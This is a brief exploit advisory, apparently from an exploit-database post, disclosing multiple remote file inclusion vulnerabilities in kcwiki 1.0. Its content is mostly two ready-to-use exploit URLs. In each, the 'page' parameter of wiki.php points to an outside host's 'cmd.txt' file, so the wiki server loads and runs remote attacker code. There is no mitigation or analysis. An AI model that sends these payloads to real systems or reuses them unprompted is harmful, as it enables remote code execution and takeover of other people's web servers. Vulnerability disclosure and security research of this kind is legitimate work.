kcwiki 1.0 multiple remote file inclusion vulnerabilities.



kcwiki 1.0 multiple remote file inclusion vulnerabilities

download http://sourceforge.net/projects/kcwiki/

author muuratsalo
contact muuratsalo[at]gmail.com

exploits
http://localhost/kcwiki-1_0-20051129/minimal/wiki.php?page=http://www.site.com/cmd.txt?
http://localhost/kcwiki-1_0-20051129/simplest/wiki.php?page=http://www.site.com/cmd.txt?